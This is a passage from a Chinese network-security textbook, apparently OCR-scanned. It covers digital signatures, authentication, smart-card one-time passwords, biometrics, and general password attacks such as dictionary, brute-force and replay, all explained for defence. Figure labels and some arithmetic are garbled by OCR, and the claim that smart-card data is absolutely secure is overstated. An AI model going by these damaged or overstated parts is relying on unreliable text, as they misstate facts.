(PEM) 就 是 采用 了 RSA 和 DES 结合 的 方法 ,目前 已 成 为 E-mail 保密 通信 标准 。 


3.6 认证 基础 


3.6.1 数字 签名 
若 A 向 B 发 送 消息 ,其 创建 数字 签名 的 过 程 (图 3.9): 


消息 收 到 的 消息 
Uv i 
散 列 算 法 散 列 算法 
i i 
消息 摘要 消息 摘要 — 
I 数 i E: 
g A £ mee KU 
z agame ki 名 i $i 
E 名 Yes 一 通过 
No 一 失败 


签名 的 生成 过 程 签名 的 验证 过 程 


(a) (b) 
图 3.9 数字 签名 的 过 程 


CD 利用 摘要 函数 计算 原 消息 的 摘要 。 

(2) 用 自己 的 私 钥 加 密 摘要 ,并 将 摘要 附 在 原 消息 的 后 面 。 

E B 接收 到 消息 ,对 数字 签名 进行 验证 的 过 程 ( 图 3. 9): 

CD 将 消息 中 的 原 消息 及 其 加 密 后 的 摘要 分 离 出 来 。 

(2) 使 用 A 的 公 钥 将 加 密 后 的 摘要 解密 。 

C3) 利用 摘要 函数 重新 计算 原 消息 的 摘要 。 

C) 将 解密 后 的 摘要 和 自己 用 相同 散 列 算法 生成 的 摘要 进行 比较 ,车 两 者 相等 ,说 明 消 
息 在 传递 过 程 中 没有 被 算 改 ,否则 ,消息 不 可 信 。 


3.6.2 身份 认证 


为 了 保护 网 络 资源 及 落实 安全 政策 。 需 要 提供 可 追究 责任 的 机 制 , 这 里 涉及 3 个 概念 : 
认证 ,授权 及 审计 。 

COD 认证 (Authentication) ; 在 做 任何 动作 之 前 必须 要 有 方法 来 识别 动作 执行 者 的 真实 
身份 。 认 证 又 称 为 鉴别 \ 确 认 。 身 份 认 证 主要 是 通过 标识 和 鉴别 用 户 的 身份 ,防止 攻击 者 假 
冒 合法 用 户 获取 访问 权限 。 

(2) 授权 (Authorization): 是 指 当 用 户 身份 被 确认 合法 后 ,赋予 该 用 户 进行 文件 和 数据 
等 操作 的 权限 。 这 种 权限 包括 读 、 写 ,执行 及 从 属 权 等 。 

(3) 审计 (Auditing): 每 一 个 人 都 应 该 为 自己 所 做 的 操作 负责 ,所 以 在 做 完事 情 之 后 都 
要 留 下 记录 ,以 便 核查 责任 。 

在 现实 生活 中 ,个 人 的 身份 主要 是 通过 各 种 证 件 来 确认 的 ,例如 : 身份 证 .户口 本 等 。 
计算 机 网 络 信息 系统 中 ,各 种 计算 资源 (如 文件 .数据库 .应 用 系统 ) 也 需要 认证 机 制 的 保护 ， 
确保 这 些 资 源 被 应 该 使 用 的 人 使 用 ,在 大 多 数 情况 下 ,认证 机 制 与 授权 和 记 账 也 紧密 结合 在 


一 起 。 身 份 认 证 是 对 网 络 中 的 主体 进行 验证 的 = 一， 
过 程 ,用 户 必须 提供 他 是 谁 的 证 明 。 身 份 认证 n 

往往 是 许多 应 用 系统 中 安全 保护 的 第 一 道 设 A p 访问 控制 资源 
防 , 它 的 失败 可 能 导致 整个 系统 的 失败 。 用 户 i fi 

对 资源 的 访问 过 程 ,如 图 3. 10 所 示 。 


身份 认证 分 为 单 向 认证 和 双向 认证 。 如 果 
通信 的 双方 只 需要 一 方 被 男 一 方 鉴别 身份 ,这 
样 的 认证 过 程 就 是 一 种 单 向 认证 。 在 双向 认证 过 程 中 ,通信 双方 需要 互相 认证 对 方 的 身份 。 

身份 认证 系统 包含 下 列 3 项 主要 组 成 元 件 。 

(1) 认证 服务 器 (Authentication Server) 

认证 服务 器 负责 进行 使 用 者 身份 认证 的 工作 ,服务 器 上 存放 使 用 者 的 私有 密 钥 、 认 证 方 
式 及 其 他 使 用 者 认证 的 相关 资讯 。 

(2) 认证 系统 用 户 端 软体 (Authentication Client Software) 

认证 系统 用 户 端 通常 都 是 需要 进行 登录 (Login) 的 设备 或 系统 ,在 这 些 设 备 或 系统 中 必 
须 具备 可 以 与 认证 服务 器 协同 运作 的 认证 协议 。 

在 有 些 情况 下 认证 服务 器 与 认证 系统 用 户 端 软体 是 集成 在 一 起 的 。 


图 3.10 用 户 对 资源 的 访问 过 程 
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(3) 认证 设备 (Authenticator) 

认证 设备 是 使 用 者 用 来 产生 或 计算 密码 的 软 、 硬 件 设 备 。 

从 用 户 角度 来 看 ,非法 用 户 常 采用 以 下 手段 在 身份 认证 过 程 中 进行 攻击 。 

CD 数据 流 窃 听 (Sniffer): 由 于 认证 信息 要 通过 网 络 传递 ,并 且 很 多 认证 系统 的 口令 是 
未 经 加 密 的 明文 ,攻击 者 通过 窃听 网 络 数 据 , 就 很 容易 分 辨 出 某 种 特定 系统 的 认证 数据 ,并 
提取 出 用 户 名 和 口令 。 

© 复制 / 重 传 : 非法 用 户 截获 信息 ,然后 再 传送 给 接收 者 。 

© 修改 或 伪造 : 非法 用 户 截获 信息 ,替换 或 修改 信息 后 再 传送 给 接收 者 ,或 者 非法 用 
户 冒 充 合 法 用 户 发 送信 息 。 

适合 于 各 种 不 同 场合 的 认证 交换 机 制 有 多 种 选择 与 组 合 。 例 如 : 

a， 当 对 等 实体 和 通信 手段 都 可 信任 时 ,一 个 对 等 实体 的 身份 可 以 通过 口令 来 证 实 。 该 
口令 能 防止 出 错 , 但 不 能 防止 恶意 行为 (特别 不 能 防止 重演 )。 相 互 鉴别 可 在 每 个 方向 上 使 
用 不 同 的 口令 来 完成 。 

b. 当 每 个 实体 信任 它 的 对 等 实体 但 不 信任 通信 手段 时 , 抗 主动 攻击 的 保护 能 够 由 口令 
与 加 密 联 合 提供 ,或 由 密码 手段 提供 。 防 止 重 演 攻击 的 需要 双方 握手 (用 保护 参数 ) ,或 时 间 
标记 (用 可 信任 时 钟 )。 带 有 重演 保护 的 相互 鉴别 ,使 用 三 方 握手 就 能 达到 。 

c. 当 实体 不 信任 (或 感到 它们 将 来 可 能 不 信任 ) 它 们 的 对 等 实体 或 通信 手段 时 ,可 以 使 
用 抗 抵赖 服务 。 使 用 数字 鉴 名 机 制 和 公证 机 制 就 能 实现 抗 抵赖 服务 ,这 些 机 制 可 与 上 面 b 
中 所 述 的 机 制 一 起 使 用 。 


3.6.3 验证 主体 身份 


在 计算 机 网 络 中 ,通常 采用 3 种 方法 验证 主体 身份 。 一 是 只 有 该 主体 了 解 的 秘密 ,如 口 
令 、 密 钥 ; 二 是 主体 携带 的 物品 ,如 智能 卡 ; 三 是 只 有 该 主体 具有 的 独一无二 的 特征 或 能 
力 ,如 指纹 声音、 视网膜 血管 分 布 图 或 签字 等 。 

1. 口令 

网 络 上 身份 认证 最 常用 的 方法 是 : 用 户 账号 十 口令 — 某 人 的 身份 。 

用 户 账 号 代表 计算 机 网 络 信息 系统 中 某 个 人 的 身份 。 

口令 用 来 验证 是 否 真 的 是 计算 机 网 络 信息 系统 所 允许 的 用 户 。 
主体 了 解 的 秘密 ,最 常用 的 就 是 口令 。 口 令 只 有 用 户 和 系统 知道 。 例 如 ,用 户 把 他 的 用 
户 名 和 口令 送 给 服务 器 。 服 务 器 就 将 它 与 数据 库 中 的 用 户 名 和 口令 进行 比较 ,如 果 相 符 , 就 
通过 了 身份 认证 。 

基于 口令 的 认证 方式 是 最 常用 的 一 种 技术 ,但 它 存 在 严重 的 安全 问题 。 安 全 性 仅 依 赖 
于 口令 ,口令 一 旦 泄露 ,用 户 即 可 被 冒充 。 由 于 用 户 为 了 方便 记忆 往往 选择 简单 .容易 被 猜 
测 的 口令 ,这 个 问题 往往 成 为 安全 系统 最 薄弱 的 突破 口 。 口 令 一 般 是 经 过 加 密 后 存放 在 口 
令 文件 中 ,如 果 口 令 文件 被 窃取 ,那么 就 可 以 进行 离线 的 字典 式 攻击 。 

2. 智能 卡 

IC 卡 是 Integrated Cirtuit( 集 成 电路 ) 卡 的 缩写 ,也 称 "Memory Card ”和 “Smart Card” , 
译 为 “聪明 卡 ”“ 智 慧 卡 "和 “智能 卡 ” 等 。 这 种 集成 电路 卡 , 是 随 着 半导体 技术 的 发 展 以 及 社 
会 对 信息 的 安全 性 和 存储 容量 要 求 的 日 益 提高 而 应 运 而 生 的 。 它 是 一 种 将 具有 加 密 、 存 储 、 


处 理 能 力 的 集成 电路 芯片 嵌 装 于 塑料 基 片 上 而 制 成 的 卡片 , 它 的 外 形 与 普通 的 信用 卡 十 分 
相似 。 

IC 卡 的 主要 优点 如 下 。 

(1) 存储 容量 

其 内 部 有 RAM、EPROM、EEPROM ,存储 容量 可 以 从 几 十 字 节 到 几 浪 字 节 ,不 同 的 应 
用 系统 选择 各 自 合 适 容 量 的 卡片 。 

(2) 体积 小 而 轻 , 便 于 携带 ,保密 性 强 

智能 卡 本 身 具有 硬件 安全 策略 ,可 以 控制 IC 卡 内 某 些 区 的 读 写 特性 ,如 果 试 图 解密 则 
这 些 区 自 锁 , 即 不 可 进行 读 写 操作 。 此 策略 安全 性 极 高 ,使 智能 卡 不 能 复制 ,所 以 智能 卡 中 
的 数据 绝对 安全 可 靠 。 

(3) 网 络 要 求 低 

IC 卡 的 绝对 安全 可 靠 性 使 其 在 应 用 中 对 计算 机 网 络 的 实时 性 、 敏 感性 要 求 降低 ` 有 利 
于 在 网 络 内 质量 不 高 的 环境 中 应 用 。 

(4) 数据 可 靠 性 高 

IC 卡 防磁 、 防 静电 、 防 潮 、 耐 温 、 抗 干扰 能 力 强 ,一 张 IC 卡片 可 重复 读 写 十 万 次 , 卡 中 数 
据 可 保存 几 十 年 ,磁卡 一 般 使 用 几 十 次 就 报废 了 。fIC 卡 读 写 机 具 比 磁卡 简单 ,数据 读 写 稳 
定 可 靠 , 出 错 率 极 小 。 

(5) 系统 要 求 

IC 卡 的 读 写 操作 是 通过 电信 号 的 传输 来 完成 ,因而 在 应 用 中 对 计算 机 的 实时 性 、 敏 感 
性 要 求 降低 。 

智能 卡 一 般 由 微 处 理 器 、 存 储 器 及 输入 /输出 设备 构成 。 对 智能 卡 潜在 的 安全 威胁 可 能 
来 自持 卡 人 、 智 能 卡 制造 商 、 软 件 制造 商 . 读 卡 器 或 第 三 方 。 智 能 卡 的 内 部 结构 如 图 3. 11 
所 示 。 
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图 3.11 智能 卡 的 内 部 结构 


微 处 理 器 计算 卡 的 一 个 唯一 的 用 户 标 识 (ID) ,ID 保证 卡 的 真实 性 , 持 卡 人 使 用 ID 访问 
系统 。 为 防止 智能 卡 遗失 或 被 窃 ,许多 系统 需要 卡 和 身份 识别 码 (Personal Identification 
Number,PIN) 同 时 使 用 。 若 仅 有 卡 而 不 知 身份 识别 码 , 则 不 能 进入 系统 。 

在 智能 卡 中 存储 私 钥 和 数字 证 书 , 给 用 户 带 来 了 安全 信息 的 轻便 移动 性 ,智能 卡 可 以 方 
便 地 从 一 台 机 器 携带 到 另 一 台 机 器 使 用 ,可 以 在 任何 一 个 地 点 进行 电子 交易 。 使 用 智能 卡 
在 线 交易 迅速 并 且 简 单 。 只 须 把 智能 卡 插入 与 计算 机 相连 的 读 卡 器 ,输入 ID 号 .PIN 码 。 
智能 卡 的 读 卡 器 也 越 来 越 普遍 ,有 USB 型 的 ,也 有 PC 卡 型 的 ,甚至 Windows 终端 上 也 有 
智能 卡 插 槽 。 
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身份 认证 过 程 中 为 了 产生 变动 的 密码 一 般 采 用 双 运 算 因 子 的 计算 方式 ,也 就 是 加 密 算 
法 的 输入 值 有 两 个 数值 ,其 一 为 用 户 密 钥 .其 二 为 变动 因子 ,由 于 用 户 密 钥 为 固定 数值 ,因此 
变动 因子 必须 不 断 变 动 才 可 以 算出 不 断 变动 的 动态 密码 。 

变动 因子 通常 有 : 随机 数字 、 时 间 等 。 服 务 器 及 智能 卡 必须 随时 保持 相同 的 变动 因子 ， 
才能 算出 相同 的 动态 密码 。 由 于 服务 器 及 智能 卡 有 相同 的 加 密 算法 、 服 务 器 存储 的 用 户 密 
钥 和 智能 卡 烧 录 的 用 户 密 钥 是 相同 的 、 双 方 使 用 的 变动 因子 在 认证 中 维持 相同 ,所 以 必定 算 
出 相同 的 动态 密码 ,用 户 不 必 记 忆 任 何 密码 。 

基于 智能 卡 的 认证 机 制 有 挑战 /响应 (Challenge/Response) 认 证 .时 间 同 步 (Time 
Synchronous) 认 证 和 事件 同步 (Event Synchronous) 认 证 。 

(1) 挑战 /响应 认证 ,挑战 /响应 认证 中 的 变动 因子 是 由 服务 器 产生 的 随机 数字 。 其 基 
本 过 程 如 图 3. 12 所 示 。 

O 认证 请 求 。 客 户 机 首先 向 服务 器 发 出 认证 请 求 ,服务 器 提示 用 户 输入 用 户 ID 和 用 
户 PIN。 

@ 挑战 。 用 户 提供 ID 给 服务 器 ,然后 服务 器 提供 一 个 一 次 性 随机 串 (Nonce)X 给 插 在 
客户 端的 智能 卡 作 为 验证 算法 的 输入 (Challenge) ,服务 器 则 根据 用 户 ID 取出 对 应 的 密 钥 
K 后 ,利用 发 送 给 客户 机 的 随机 串 X, 在 服务 器 上 用 加 密 引 擎 进行 运算 ,得 到 运算 结果 Rs。 

@ 响应 。 智 能 卡 根据 输入 的 随机 串 X 与 内 在 的 密 钥 K 使 用 硬件 加 密 引擎 运算 ,也 得 
到 一 个 运算 结果 Re CResponse) . 此 运算 结果 将 作为 认证 的 依据 直接 在 网 络 中 发 送 给 服 
务 器 。 

@ 验证 结果 。 比 较 两 运算 结果 Rs( 服 务 器 ) 与 Re( 客 户 机 ) 是 否 相 同 , 便 可 确定 一 个 网 
络 用 户 的 合法 性 。 

由 于 密 钥 存在 于 智能 卡 中 ,也 未 直接 在 网 上 发 送 ,整个 运算 过 程 也 是 在 智能 卡 中 来 完 
的 , 密 钥 鉴 别 是 通过 加 密 算 法 来 实现 的 ,因而 极 大 地 提高 了 安全 性 。 并 且 每 当 客户 端 有 一 次 
服务 申请 时 ,服务 器 便 产 生 一 个 随机 串 给 客户 ,即使 在 网 上 传输 的 认证 数据 被 截获 ,也 不 能 
带 来 安全 上 的 问题 。 挑 战 /响应 认证 如 图 3. 13 所 示 。 


私有 密 钥 Challenge=Challenge 私有 密 钥 


Wir 
响应 mo 


E 智能 卡 
验证 结果 |” "d 
动态 密码 -动态 密码 
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基本 过 程 


(2) 时 间 同 步 认 证 

时 间 同 步 认 证 中 的 变动 因子 使 用 服务 器 端 与 客户 端的 同步 时 间 值 。 其 认证 过 程 
如 下 : 

CD 用 户 向 服务 器 发 出 登录 请 求 ,服务 器 提示 用 户 输入 用 户 ID 和 用 户 PIN, 

Q) 服务 器 根据 用 户 ID 取出 对 应 的 密 钥 K,. 使 用 与 服务 器 时 间 T 计算 动态 密码 Rs。 

© 智能 卡 根据 内 在 的 密 钥 K 与 客户 机 时 间 T. 使 用 相同 的 专用 算法 计算 动态 密码 Re, 


并 把 Re 发 送 给 服务 器 。 

@ 服务 器 比较 Rs 与 Re, 如 果 相 同 则 用 户 合 法 。 时 间 同 步 认 证 如 图 3. 14 所 示 。 

时 间 同 步 认 证 使 用 简单 ,但 需要 进行 时 间 同 步 ,通常 要 求 服务 器 时 间 与 客户 机 时 间 误 差 
不 超过 60s, 否 则 需要 与 服务 器 对 时 以 保持 同步 。 

(3) 事件 同步 认证 

事件 同步 认证 卡 依据 认证 卡 上 的 私有 密 钥 产生 一 序列 的 动态 密码 ,如 果 使 用 者 意外 多 
产生 了 几 组 密码 造成 不 同步 的 状态 ,服务 器 会 自动 重新 同步 到 目前 使 用 的 密码 ,一旦 一 个 密 
码 被 使 用 过 后 ,在 密码 序列 中 所 有 这 个 密码 之 前 的 密码 都 会 失效 。 

优点 是 认证 卡 容易 使 用 ; 事件 同步 是 唯一 可 以 在 批 次 运作 环境 下 使 用 的 技术 ,因为 可 
以 预先 产生 未 来 预计 要 使 用 的 密码 ; 基于 使 用 者 无 法 知道 序列 数字 ,所 以 安全 性 高 ,序列 数 
字 绝 不 会 显示 出 来 。 

缺点 是 如 果 没 有 PIN 号 码 的 保护 及 认证 卡 借 给 别人 使 用 时 ,会 有 安全 的 疑虑 。 事 件 同 
步 认 证 如 图 3.15 所 示 。 
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图 3.14 时 间 同 步 认证 图 3.15 事件 同步 认证 
3. 生物 特征 认证 


生物 特征 认证 是 指 通过 自动 化 技术 利用 人 体 的 生理 特征 和 (或 ) 行 为 特征 进行 身份 鉴 
定 。 目 前 利用 生理 特征 进行 生物 识别 的 主要 方法 有 : 指纹 识别 .虹膜 识别 .手掌 识别 、. 视 网 
膜 识别 和 脸 相识 别 ; 利用 行为 特征 进行 识别 的 主要 方法 有 : 声音 识别 .笔迹 识别 和 击 键 识 
别 等 。 除 了 这 些 比较 成 熟 的 生物 识别 技术 之 外 ,还 有 许多 新 兴 的 技术 ,如 耳 杀 识别 .人 体 
气味 识别 ,血管 识别 , 步 态 识 别 等。 随 着 现代 生物 技术 的 发 展 ,尤其 是 人 类 基因 组 织 研究 
的 重大 突破 ,研究 人 员 认 为 DNA 识别 技术 或 基因 型 识别 技术 将 是 未 来 生物 识别 技术 的 
主流 。 

只 要 满足 以 下 条 件 的 人 体 物 理 或 行为 特征 才 可 以 用 来 作为 识别 个 人 身份 。 

OD 普遍 性 : 即 每 个 人 都 应 该 具有 这 一 特征 。 

(2) 唯一 性 : 即 每 个 人 在 这 一 特征 上 有 不 同 的 表现 。 

(3) 稳定 性 : 即 这 一 特征 不 会 随 着 年 龄 的 增长 .时间 的 改变 而 改变 。 

(4) 易 采 集 性 : 即 这 一 特征 应 该 是 容易 测量 的 。 

(5) 可 接受 性 : 即 人 们 是 否 接 受 这 种 生物 识别 方式 。 

生物 特征 认证 的 核心 在 于 如 何 获取 这 些 生 物 特征 ,并 将 它 转换 为 数字 信息 ,存储 于 计算 
机 中 ,利用 可 靠 的 匹配 算法 来 完成 验证 与 识别 个 人 身份 的 过 程 。 所 有 的 生物 识别 系统 都 包 
括 : 采集 、 解 码 、 比 对 和 匹配 处 理 过 程 。 

由 于 人 体 生物 特征 具有 人 体 所 固有 的 不 可 复制 的 唯一 性 ,这 使 得 生物 识别 身份 验证 方 
法 可 以 不 依赖 于 各 种 人 造 的 和 附加 的 物品 来 证 明 自 己 的 身份 ,而 用 来 证 明 自 身 的 恰恰 是 人 
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本 身 , 由 于 这 些 生物 密 钥 不 会 丢失 ,不 会 遗忘 ,很 难 伪造 和 假冒 。 而 常见 的 口令 、IC 卡 、 条 纹 
码 、 磁 卡 或 钥匙 则 存在 着 丢失 、 遗 忘 、 复 制 及 被 盗用 诸多 不 利 因素 。 因 此 采用 生物 特征 具有 
更 强 的 安全 性 与 方便 性 。 

(1) 指纹 

指纹 识别 是 最 传统 、 最 成 熟 的 生物 鉴定 方式 。 目 前 ,全 球 范围 内 都 建立 了 指纹 鉴定 机 构 
及 罪犯 指纹 数据 库 , 指 纹 鉴 定 已 经 被 官方 所 接受 ,成 为 司法 部 门 有 效 的 身份 鉴定 手段 。 

指纹 识别 处 理 包括 对 指纹 图 像 采集 .指纹 图 像 处 理 特征 提取 、 特 征 值 的 比 对 与 匹配 等 过 
程 。 许 多 研究 表明 指纹 识别 在 所 有 生物 识别 技术 中 是 对 人 体 最 不 构成 侵犯 的 一 种 技术 
手段 。 

指纹 识别 的 优点 如 下 。 

CD 独特 性 。19 世纪 末 , 英 国学 者 享 利 提出 了 基于 指纹 特征 进行 识别 的 原理 和 方法 。 
按 享 利 的 理论 ,一 般 人 的 指纹 在 出 生 后 9 个 月 得 以 成 形 并 终身 不 变 ; 每 个 指纹 一 般 都 有 
70—150 个 基本 特征 点 。 从 概率 学 的 角度 来 看 ,在 两 枚 指纹 中 只 要 有 12 一 13 个 特征 点 吻 
合 , 即 可 认定 为 同一 指纹 。 按 现 有 人 口 计算 , 上 述 概率 120 年 才 可 出 现 两 枚 完全 相同 的 
指纹 。 

O 稳定 性 。 指 纹 纹 疹 的 样式 终生 不 变 。 例 如 ,指纹 不 会 随 着 人 的 年 龄 的 增长 ,或 身体 
健康 程度 的 变化 而 变化 。 人 的 声音 却 有 着 较 大 的 变化 。 

© 方便 性 。 目 前 已 有 标准 的 指纹 样本 库 , 方 便 了 识别 系统 的 软件 开发 ; 另外 ,识别 系 
统 中 完成 指纹 采样 功能 的 硬件 部 分 ( 即 指纹 采集 仪 ) 也 较 易 实现 。 

(2) 掌 纹 

每 个 人 的 手 的 形状 都 是 不 同 的 ,而 且 这 个 手 的 形状 在 人 达到 一 定年 龄 之 后 就 不 再 发 生 
显著 变化 。 手 形 读 取 器 能 够 捕获 一 个 手 的 三 维 图 像 , 并 能 够 对 手指 和 指 关节 的 形状 和 长 度 
进行 测量 。 

(3) 视网膜 血管 图 

人 眼球 视网膜 的 中 央 动 脉 ,在 眼底 至 视觉 神经 处 分 为 上 下 两 支 ,然后 在 视网膜 杜 侧 上 下 
及 自 侧 上 下 再 分 为 4 支 小 动脉 ,各 支 小 动脉 再 逐 级 分 的 更 细 、 更 小 ,以 至 在 视网膜 上 形成 四 
通 八 达 的 毛细 血管 网 ,此 即 临 床 医生 观察 眼底 诊 病 的 眼底 血管 图 。 在 20 世纪 30 年 代 , 通 过 
研究 就 得 出 了 人 类 眼球 后 部 血管 分 布 唯一 性 的 理论 .除了 患 有 眼疾 或 严重 的 脑 外 伤 外 , 视 网 
膜 的 结构 形式 在 人 的 一 生 当 中 都 相当 稳定 ,如 图 3. 16 所 示 。 


Js 脉络 膜 
图 3.16 视网膜 结构 


3.7 认证 协议 


3.7.1 基于 口令 的 认证 


通过 用 户 ID 和 口令 进行 认证 是 操作 系统 或 应 用 程序 通常 采用 的 。 如 果 非 法 用 户 获 得 
合法 用 户 身 份 的 口令 ,就 可 以 自由 访问 未 授权 的 系统 资源 ,所 以 需要 防止 口令 泄露 。 易 猜 的 
口令 或 默认 口令 也 是 一 个 很 严重 的 问题 ,但 一 个 更 严重 的 问题 是 有 的 账号 根本 没有 口令 。 
实际 上 ,所 有 使 用 弱 口 令 ,默认 口令 和 没有 口令 的 账号 都 应 从 系统 中 清除 。 另 外 ,很 多 系统 
有 内 置 的 或 默认 的 账号 ,这 些 账 号 在 软件 的 安装 过 程 中 通常 口令 是 不 变 的 。 攻 击 者 通常 查 
找 这 些 账 号 。 因 此 ,所 有 内 置 的 或 默认 的 账号 都 应 从 系统 中 移出 。 

目前 各 类 计算 资源 主要 靠 固定 口令 的 方式 来 保护 。 这 种 以 固定 口令 为 基础 的 认证 方式 
存在 很 多 问题 ,对 口令 的 攻击 包括 以 下 几 种 。 

1. 网 络 数 据 流 窃听 

攻击 者 通过 窃听 网 络 数 据 流 , 如 果 口 令 使 用 明文 传输 , 则 可 被 非法 截获 。 大 量 的 通信 协 
议 ( 如 Telnet、.FTP、HTTP) 都 使 用 明文 口令 ,这 意味 着 它们 在 网 络 上 是 以 未 加 密 格式 传输 
于 服务 器 端 和 客户 端 ,而 入 侵 者 只 需 使 用 协议 分 析 器 就 能 查看 到 这 些 信息 ,从 而 进一步 分 析 
出 口令 ,如 图 3.17 Bros. 

2. 认证 信息 截取 / 重 放 (Record/Replay) 

有 的 系统 会 将 认证 信息 进行 简单 加 密 后 进行 传输 ,如 果 攻 击 者 无 法 用 第 一 种 方式 推算 
出 密码 ,可 以 使 用 截取 / 重 放 方式 ,需要 的 是 重新 编写 客户 端 软件 以 使 用 加 密 口令 实现 系统 
登录 ,如 图 3. 18 所 示 。 


Login:UserA Password:12345 认证 信息 Li 


m 复制 认证 信息 
LI (mor 
FE FE 
图 3.17 Fg A ei OTT 图 3. 18 认证 信息 截取 / 重 放 


3. 字典 攻击 

根据 调查 结果 可 知 ,大 部 分 的 用 户 为 了 方便 记忆 选用 的 密码 都 与 自己 周边 的 事物 有 关 ， 
例如 ,身份 证 号 码 、 生 日 \ 车 牌号 码 、 在 办 公 桌 上 可 以 马上 看 到 的 标记 或 事物 、 其 他 有 意义 的 
单词 或 数字 , 某 些 攻击 者 会 使 用 字典 中 的 单词 来 尝试 用 户 的 密码 。 所 以 大 多 数 系 统 都 建议 
用 户 在 口令 中 加 入 特殊 字符 ,以 增加 口令 的 安全 性 。 

4. 穷 举 攻击 (Brute Force) 

穷 举 攻击 也 称 为 蛮 力 破解 。 这 是 一 种 特殊 的 字典 攻击 , 它 使 用 字符 串 的 全 集 作 为 字典 。 
如 果 用 户 的 密码 较 短 ,很 容易 被 穷 举 出 来 ,因而 很 多 系统 都 建议 用 户 使 用 长 口令 。 

5. Sg 

攻击 者 利用 与 被 攻击 系统 接近 的 机 会 ,安装 监视 器 或 亲自 窥探 合法 用 户 输入 口令 的 过 
程 , 以 得 到 用 户口 令 。 
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6. 社交 工程 

社会 工程 是 指 采用 非 隐蔽 方法 盗用 口令 等 ,例如 ,冒充 是 处 长 或 局 长 骗取 管理 员 信任 得 
到 口令 等 。 冒 充 合法 用 户 发 送 邮 件 或 打 电 话 给 管理 人 员 ,以 骗取 用 户口 令 等 。 例 如 ,在 终端 
上 可 能 发 现 如 下 信息 : 

Please enter you user name to logon: 

Your password: 

这 很 可 能 是 一 个 模仿 登录 信息 的 特洛伊 木马 程序 , 它 会 记录 口令 ,然后 传 给 入 侵 者 。 

7. 垃圾 搜索 

攻击 者 通过 搜索 被 攻击 者 的 废弃 物 , 得 到 与 攻击 系统 有 关 的 信息 ,如 果 用 户 将 口令 写 在 
纸 上 又 随便 丢弃 , 则 很 容易 成 为 垃圾 搜索 的 攻击 对 象 。 

在 口令 的 设置 过 程 中 ,有 许多 个 人 因素 在 起 作用 ,攻击 者 可 以 利用 这 些 因素 来 解密 。 由 
于 口令 安全 性 的 考虑 ,人 们 会 被 禁止 把 口令 写 在 纸 上 , 因 此 很 多 人 都 设法 使 自己 的 口令 容易 
记忆 ,而 这 就 给 攻击 者 提供 了 可 乘 之 机 。 为 防止 攻击 者 猜 中 口令 。 安 全 口令 具有 以 下 特点 : 

A) 位 数 >6 位 。 

D 大 小 写字 母 混合 。 如 果 用 一 个 大 写字 母 , 既 不 要 放 在 开头 ,也 不 要 放 在 结尾 。 

(3) 可 以 把 数字 无 序 的 加 在 字母 中 。 

(4) 系统 用 户 一 定 用 8 位 口令 ,而 且 包 括 ~~、!1、@、#、$ 本 RIO 

3.7.1.1 不 安全 的 口令 

1. 使 用 用 户 名 (账号 ) 作 为 口令 

这 种 方法 便于 记忆 ,可 是 在 安全 上 几乎 是 不 堪 一 击 。 几 乎 所 有 以 破解 口令 为 手段 的 黑 
客 软件 ,都 首先 会 将 用 户 名 作为 口令 的 突破 口 。 

2. 使 用 用 户 名 (账号 ) 的 变换 形式 作为 口令 

将 用 户 名 颠倒 或 加 前 后 级 作为 口令 ,比如 说 著名 的 黑客 软件 John, 如 果 用 户 名 是 fool. 
那么 它 在 尝试 使 用 fool 作为 口令 之 后 ,还 会 试 着 使 用 诸如 f001123, fooll,loof,1oof123,lofo 
等 作为 口令 。 

3. 使 用 自己 或 亲友 的 生日 作为 口令 

这 种 口令 有 着 很 大 的 欺骗 性 ,因为 这 样 往往 可 以 得 到 一 个 6 位 或 8 位 的 口令 ,但 实际 上 
可 能 的 表达 方式 只 有 100 12 31— 37 200 种 ,即使 再 考虑 到 年 月 日 三 者 共有 6 种 排列 顺 
序 ,一 共 也 只 有 37 200 6—223 200 种 。 

4. 使 用 常用 的 英文 单词 作为 口令 

这 种 方法 比 前 几 种 方法 要 安全 一 些 。 如 果 选 用 的 单词 是 十 分 偏僻 的 ,那么 黑客 软件 就 
可 能 无 能 为 力 了 。 

为 判断 系统 是 否 易 受 攻击 ,首先 需要 了 解 系统 上 都 有 哪些 账号 。 应 进行 以 下 操作 : 

(1) 审计 系统 上 的 账号 ,建立 一 个 使 用 者 列表 ,同时 检查 路 由 ,连接 Internet 的 打印 机 、 
复印 机 和 打印 机 控制 器 等 系统 的 口令 。 

(2) 制定 管理 制度 ,规范 增加 账号 的 操作 ,及 时 移 走 不 再 使 用 的 账号 。 

G) 经 常 检 查 确 认 有 没有 增加 新 的 账号 ,不 使 用 的 账号 是 否 已 被 删除 。 

(4) 对 所 有 的 账号 运行 口令 破解 工具 ,以 寻找 弱 口 令 或 没有 口令 的 账号 。 


O) 当 雇员 或 承包 商 离开 公司 时 ,或 当 账号 不 再 需要 时 ,应 有 严格 的 制度 保证 删除 这 些 
账号 。 
应 采取 两 个 步骤 以 消除 口令 漏洞 。 第 一 步 , 所 有 没有 口令 的 账号 应 被 删除 或 加 上 一 个 
口令 ,所 有 弱 口 令 应 被 加 强 。 但 是 当 用 户 被 要 求 改 变 或 加 强 他 们 的 弱 口 令 时 ,他 们 经 常 又 选 
择 一 个 容易 猜测 的 。 这 就 导致 了 第 二 步 , 用 户 的 口令 在 被 修改 后 ,应 加 以 确认 。 可 以 用 程序 
来 拒绝 任何 不 符合 安全 策略 的 口令 。 

可 以 采取 以 下 措施 来 加 强 口 令 的 安全 性 : 

O 在 创建 口令 时 执行 检查 功能 。 如 检查 口令 的 长 度 。 

O 强制 使 口令 周期 性 过 期 。 也 就 是 定期 更 换 口令 。 

O 保持 口令 历史 记录 ,使 用 户 不 能 循环 使 用 旧 口 令 。 

3.7.1.2. 基于 口令 的 认证 

1. 基于 单 向 函数 

计算 机 存储 口令 的 单 向 函数 值 而 不 是 存储 口令 。Alice 将 口令 传送 给 计算 机 ,计算 机 使 
用 单 向 函数 计算 ,然后 把 单 向 函数 的 运算 结果 和 它 以 前 存储 的 单 向 函数 值 进 行 比较 。 由 于 
计算 机 不 再 存储 口令 表 , 所 以 攻击 者 侵 和 人 计算 机 偷 取 口令 的 威胁 就 减少 了 。 

2. 掺 杂 口 令 

如 果 攻 击 者 获得 了 存储 口令 的 单 向 函数 值 的 文件 ,采用 字典 攻击 是 有 效 的 。 攻 击 者 计 
算 猜 测 的 口令 的 单 向 函数 值 ,然后 搜索 文件 ,观察 是 否 有 匹配 的 。 

Salt 是 使 这 种 攻击 更 困难 的 一 种 方法 。Salt 是 一 个 随机 字符 串 , 它 与 口令 连接 在 一 起 ， 
